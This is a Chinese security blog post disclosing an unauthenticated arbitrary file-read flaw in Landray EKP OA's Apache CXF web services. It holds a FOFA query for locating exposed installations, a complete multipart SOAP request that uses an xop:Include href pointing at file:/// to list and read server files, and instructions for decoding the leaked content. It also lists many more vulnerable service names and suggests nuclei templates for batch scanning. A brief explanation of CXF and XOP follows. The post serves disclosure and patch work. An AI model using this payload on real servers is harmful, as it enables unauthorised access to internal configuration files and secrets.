蓝凌EKP sys/webservice/elecPsealUseWebService 文件读取漏洞


漏洞简介

蓝凌核心产品EKP平台定位为数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织的内外协作与管理,支撑商业模式创新与转型发展。由于蓝凌OA sys/webservice/ 接口下多个接口如 kmsMultidocMaintainCategoryWSService、elecPsealUseWebService、elecSealInfoWebService等等众多接口未对用户输入的数据进行严格的校验和过滤导致文件读取漏洞。未经身份验证的攻击者可读取系统内部配置文件造成信息泄露。

FOFA语法

app="Landray-OA系统"

漏洞复现

访问 http://landray.mrxn.net/sys/webservice/?wsdl 获取完整 CXF - Service list 之后再对每一个 service WSDL链接配合burp Wsdler插件测试,或者在较新版本burp中直接扫描,它会自动爬取wsdl连接并测试,也可以写个nuclei模板批量扫描测试。

POST /sys/webservice/elecPsealUseWebService HTTP/1.1
Host: landray.mrxn.net
Content-Type: multipart/related; boundary=----123456; type="application/xop+xml"

------123456
Content-Type: application/xop+xml; charset=UTF-8
Content-Transfer-Encoding: 8bit

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pseal.elec.kmss.landray.com/">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:applyUseSeal>
         <arg0>
            <abc><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"/></abc>
         </arg0>
      </ser:applyUseSeal>
   </soapenv:Body>
</soapenv:Envelope>
------123456--

对响应中的 Unmarshalling Error: 后的内容进行 base64 解码 即可得到文件列表或者文件内容。

部分接口

eopBasedataSupplierWebserviceService
kmsMaintainLogWSService
kmsAskWebservice
kmsMultidocSearchCategoryWSService
thirdImSyncForKKWebService
kmsWikiSearchCategoryWSService
kmsMultidocMaintainDocWSService
kmForumWebserviceService
kmsWikiMaintainCategoryWSService
kmsWikiMaintainDocWSService
sysNewsWebService
fsscLedgerContractWebserviceService
sysSynchroSetOrgWebService
kmRelativeWebService
lbpmFlowLogGetWebService
sysHandoverWebService
fsscCtripBusinessOrderWebService
kmCalendarWebserviceService
sysZoneWebService
yworkWebserviceService
sysAttendWebService
wsTestProjectServiceImp
fsscLedgerWebserviceService
modelingAppModelWSService
sysFormMainDataInsystemWebservice

稍微跑了下,太多了!!!这只是一部分。。。

漏洞分析

不算分析,主要是由蓝凌使用了Apache CXF 框架且启用了SOAP服务的 XOP 功能同时服务器未对 的 href 属性进行校验,允许访问任意协议或路径。

什么是Apache CXF

Apache CXF 是一个开源的 Web 服务框架,全称为 Celtix XFire,由两个开源项目 Celtix 和 XFire 合并而来。它提供了创建和消费 Web 服务的工具,支持多种协议和标准,如 SOAP、RESTful 服务、JAX-RS、JAX-WS 等。

CXF 与 XOP 的结合

CXF 的功能

  • Apache CXF 支持 SOAP 和 WS-* 协议,其中 SOAP 的实现可能涉及 XML 的扩展优化技术,如 XOP(XML-binary Optimized Packaging)。
  • 在 XOP 中,二进制数据(如文件、图片)不直接嵌入到 XML 消息中,而是通过 <xop:Include> 元素的 href 属性引用外部资源。

XOP 的工作原理

  • XOP 消息由主 XML 文档和附件(通常是二进制文件)组成,通过 multipart/related 格式打包。
  • <xop:Include> 的 href 属性可以使用 cid: 协议引用多部分中的其他部分,或者指向一个外部资源(如 file://、http://)。

手机扫码阅读

百卓Smart管理平台 autheditpwd.php SQL注入漏洞

万户OA govdocumentmanager_sendfile_gd.jsp SQL注入漏洞

评 论
avatar
OA 被安全部门扫出漏洞,结果搜到你这里来了。/doge
1 年前 回复
avatar
Mrxn
@Secret:哈哈 ? 让他们关注我博客就对了(不是
1 年前 回复